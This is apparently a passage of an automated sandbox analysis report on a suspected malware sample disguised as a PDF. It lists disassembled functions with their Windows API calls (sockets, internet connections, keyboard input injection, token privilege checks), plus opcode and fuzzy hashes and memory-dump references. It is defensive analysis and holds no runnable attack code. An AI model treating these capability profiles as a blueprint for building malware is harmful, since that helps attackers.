                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: 5ec2f8a6903ce9303c7bad0b6a77d43542a34da66a9bde29430d10ef59d34628
                                                                          • Instruction ID: 18c7c8d946595dd0f374338f15548202ead568223d4ac85b5db8ec95c3322778
                                                                          • Opcode Fuzzy Hash: 5ec2f8a6903ce9303c7bad0b6a77d43542a34da66a9bde29430d10ef59d34628
                                                                          • Instruction Fuzzy Hash: F551E374658302AADB34AF69D8D5A3EB3E4EF48310F30C85FE596DB691DF7098449B01
                                                                          Function 00B69A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(0106F250,?), ref: 00B69AD2
                                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00B69B05
                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B69B72
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
                                                                          • Opcode ID: b42b58221e872786aa25e2fe1b11cad22d6d362c6f7219a7e8879f5b91c594a6
                                                                          • Instruction ID: e3f9292b2c5113088b50d3fef46fdb427a41661e5a788c99ba78a46ab06aef99
                                                                          • Opcode Fuzzy Hash: b42b58221e872786aa25e2fe1b11cad22d6d362c6f7219a7e8879f5b91c594a6
                                                                          • Instruction Fuzzy Hash: 2E515374A00209EFCF10DF64D9819AE7BF9FF55760F1481A9F8259B2A0D774AD41CB50
                                                                          Function 00B56CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00B56CE4
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56CF4
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B56D58
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56D64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                          • String ID:
                                                                          • API String ID: 2214342067-0
                                                                          • Opcode ID: c9c065983f39e988a569054ecf0b594e73f0d522d26f64dcfef3b6cd69ba14c5
                                                                          • Instruction ID: d15af0c4aa295c3fda9538ed2f9c901a8c86d711bbbc40eba8616e732bbf0d8a
                                                                          • Opcode Fuzzy Hash: c9c065983f39e988a569054ecf0b594e73f0d522d26f64dcfef3b6cd69ba14c5
                                                                          • Instruction Fuzzy Hash: 9141B474740300AFEB20AF25DD86F3A77E5EF48B10F4484A8FA599B2D2DAB49C008791
                                                                          Function 00B5672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B6F910), ref: 00B567BA
                                                                          • _strlen.LIBCMT ref: 00B567EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _strlen
                                                                          • String ID:
                                                                          • API String ID: 4218353326-0
                                                                          • Opcode ID: 88be021bd2e7c1dfbbccfd35062d2e78d481b6a8356f1183e8f21d7b4c8d8c91
                                                                          • Instruction ID: 9bc3209db138c25907fe2269156ae668b21d7c2706585a2a7a93ddc2261696d5
                                                                          • Opcode Fuzzy Hash: 88be021bd2e7c1dfbbccfd35062d2e78d481b6a8356f1183e8f21d7b4c8d8c91
                                                                          • Instruction Fuzzy Hash: 0B41C231A00204AFCB14EB65DDC5FAEB7E8EF58314F6481E9F8169B292DB30AD04C750
                                                                          Function 00B4BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B4BB09
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00B4BB2F
                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B4BB54
                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B4BB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: 597cf25d6fc8f58c7a7d84db7afc700f903e950fc8f7d06538b9a8f072f46a11
                                                                          • Instruction ID: 26644e1e0b6ef7ba58a353546be6fe6163d6098e543b85cb6c473746785411f9
                                                                          • Opcode Fuzzy Hash: 597cf25d6fc8f58c7a7d84db7afc700f903e950fc8f7d06538b9a8f072f46a11
                                                                          • Instruction Fuzzy Hash: 99412639200651DFCB10EF16C684A5EBBE1EF89310B198498F94A9B362CB34FD01DB91
                                                                          Function 00B68AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B68B4D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 6aaef161731937ec2e1aa22beace1994b7d8d0d4a0cbe2a0a98687a66f24e01e
                                                                          • Instruction ID: abde132d305ed000db8088a69b3687d8bcc1a85baede9f486f289bea0ce9bfe1
                                                                          • Opcode Fuzzy Hash: 6aaef161731937ec2e1aa22beace1994b7d8d0d4a0cbe2a0a98687a66f24e01e
                                                                          • Instruction Fuzzy Hash: 2C31C6B4604204BFEF209F58DC99FA937E5EB0A310F284796FA51D72E0CE7AA9409751
                                                                          Function 00B6ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6AE1A
                                                                          • GetWindowRect.USER32(?,?), ref: 00B6AE90
                                                                          • PtInRect.USER32(?,?,00B6C304), ref: 00B6AEA0
                                                                          • MessageBeep.USER32(00000000), ref: 00B6AF11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: e0bf70e12609bd632dd2269faa0e7c8d8c45aa2b72ee42ca5cdf0253aeee5416
                                                                          • Instruction ID: d3d408702d16d216539ff60a079007f1b13fef55247b212730b7576b2fe4908b
                                                                          • Opcode Fuzzy Hash: e0bf70e12609bd632dd2269faa0e7c8d8c45aa2b72ee42ca5cdf0253aeee5416
                                                                          • Instruction Fuzzy Hash: 4E417C70600119DFCF11DF58D885A69BBF5FB49740F2881A9E419EB291DB39A901CF92
                                                                          Function 00B40FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B41037
                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B41053
                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B410B9
                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B4110B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 4fd23db7dd16ce90bf92e9802d03043fe6eed989c840534836657e3d4056457f
                                                                          • Instruction ID: f9900cb58a98c31039288a3e66c40f6ef9b3b44f912efde1260ecded46f3e532
                                                                          • Opcode Fuzzy Hash: 4fd23db7dd16ce90bf92e9802d03043fe6eed989c840534836657e3d4056457f
                                                                          • Instruction Fuzzy Hash: 8C314830E40688AEFF348B6D8C05BF9BBE9EB54310F04469AE591522D1C3748FC0B752
                                                                          Function 00B41121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B41176
                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B41192
                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B411F1
                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B41243
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: b0aa1c14f892fd4b42b4e950eec54bf1cf22890478689e6b07d3a905dc24e275
                                                                          • Instruction ID: 4619fb0d459d0f05b41a81f8a041138e02030f88efd23b29526e1f22960df8a6
                                                                          • Opcode Fuzzy Hash: b0aa1c14f892fd4b42b4e950eec54bf1cf22890478689e6b07d3a905dc24e275
                                                                          • Instruction Fuzzy Hash: 3531E730E407186AEF20DB6D88097FA7BFAEB49310F044B9AE695A21D1C3784FD5A751
                                                                          Function 00B16415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B1644B
                                                                          • __isleadbyte_l.LIBCMT ref: 00B16479
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B164A7
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B164DD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 1225fef7fea8ee32df0c449a5c3965ff625078ba648ce5e9ecccf395b191966e
                                                                          • Instruction ID: ecd32a87e3a528b7540f6566095908c579cf34567d97dfdce29b2fdc0fb6907c
                                                                          • Opcode Fuzzy Hash: 1225fef7fea8ee32df0c449a5c3965ff625078ba648ce5e9ecccf395b191966e
                                                                          • Instruction Fuzzy Hash: F831EF31600256AFDB21CF69CC84BFA7BE9FF41310F5540A9E864872A0EB31D990DB90
                                                                          Function 00B65175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00B65189
                                                                            • Part of subcall function 00B4387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B43897
                                                                            • Part of subcall function 00B4387D: GetCurrentThreadId.KERNEL32 ref: 00B4389E
                                                                            • Part of subcall function 00B4387D: AttachThreadInput.USER32(00000000,?,00B452A7), ref: 00B438A5
                                                                          • GetCaretPos.USER32(?), ref: 00B6519A
                                                                          • ClientToScreen.USER32(00000000,?), ref: 00B651D5
                                                                          • GetForegroundWindow.USER32 ref: 00B651DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: 022fe638ec98703ee93eabaadee479c0fcb108ffb2dd035cba63ff19951166d5
                                                                          • Instruction ID: 73ab733be9f919ca3309dbae34db9e5a8e7b4c3dc008057f68a5c59ab390e74c
                                                                          • Opcode Fuzzy Hash: 022fe638ec98703ee93eabaadee479c0fcb108ffb2dd035cba63ff19951166d5
                                                                          • Instruction Fuzzy Hash: 7831F0B1900248AFDB10EFA5DD859EFB7F9EF98300F1040AAE415E7251EA759E45CBA0
                                                                          Function 00B6C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • GetCursorPos.USER32(?), ref: 00B6C7C2
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B1BBFB,?,?,?,?,?), ref: 00B6C7D7
                                                                          • GetCursorPos.USER32(?), ref: 00B6C824
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B1BBFB,?,?,?), ref: 00B6C85E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          • Opcode ID: 53054d03954daa9bfe9543269fe7db497f9db59003c6191642ef71c1e565641d
                                                                          • Instruction ID: 943c33076804059a11f459f4f759633aa14a900eeb83d7f4fbbdf89fe8ad93ff
                                                                          • Opcode Fuzzy Hash: 53054d03954daa9bfe9543269fe7db497f9db59003c6191642ef71c1e565641d
                                                                          • Instruction Fuzzy Hash: 11317436600018AFCB25CF59D898EFA7FFAEB49710F0481A9F9458B2A1C7399D50DF60
                                                                          Function 00B38B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B38652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B38669
                                                                            • Part of subcall function 00B38652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B38673
                                                                            • Part of subcall function 00B38652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38682
                                                                            • Part of subcall function 00B38652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38689
                                                                            • Part of subcall function 00B38652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3869F
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B38BEB
                                                                          • _memcmp.LIBCMT ref: 00B38C0E
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B38C44
                                                                          • HeapFree.KERNEL32(00000000), ref: 00B38C4B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                          • String ID:
                                                                          • API String ID: 1592001646-0
                                                                          • Opcode ID: 584e2572523d6d9a41a234fee6b6515f1a0188f3326ed0d0b57e9c8c492e563e
                                                                          • Instruction ID: ba476d31aa104a0f6c94b7104e6f2213611aad75e28f95e2cb5974fc5e22e031
                                                                          • Opcode Fuzzy Hash: 584e2572523d6d9a41a234fee6b6515f1a0188f3326ed0d0b57e9c8c492e563e
                                                                          • Instruction Fuzzy Hash: 1D21AC71E01209EFCB00CFA4C955BEEB7F8EF40340F644099E554A7240EB75AE06CB61
                                                                          Function 00B00BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __setmode.LIBCMT ref: 00B00BF2
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B47B20,?,?,00000000), ref: 00AE5B8C
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B47B20,?,?,00000000,?,?), ref: 00AE5BB0
                                                                          • _fprintf.LIBCMT ref: 00B00C29
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 00B36331
                                                                            • Part of subcall function 00B04CDA: _flsall.LIBCMT ref: 00B04CF3
                                                                          • __setmode.LIBCMT ref: 00B00C5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                          • String ID:
                                                                          • API String ID: 521402451-0
                                                                          • Opcode ID: 5e6ad3c49e996c6752b00d2ab60034e04f2bf3e638964b17253e5ef1cb3dcd33
                                                                          • Instruction ID: 3e61ef3332ff1028db49140622369d58750dd1e2ea44ee2951adf2ba4813e04f
                                                                          • Opcode Fuzzy Hash: 5e6ad3c49e996c6752b00d2ab60034e04f2bf3e638964b17253e5ef1cb3dcd33
                                                                          • Instruction Fuzzy Hash: 8A1136729042047EDB14B7B9AC83ABE7FE8DF45320F1441EAF204971E2DF605D819795
                                                                          Function 00B51A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B51A97
                                                                            • Part of subcall function 00B51B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B51B40
                                                                            • Part of subcall function 00B51B21: InternetCloseHandle.WININET(00000000), ref: 00B51BDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 1463438336-0
                                                                          • Opcode ID: b43e1c6aff52642442f693a0874e3eaa08e656bb127c4622d487e7f96ef11153
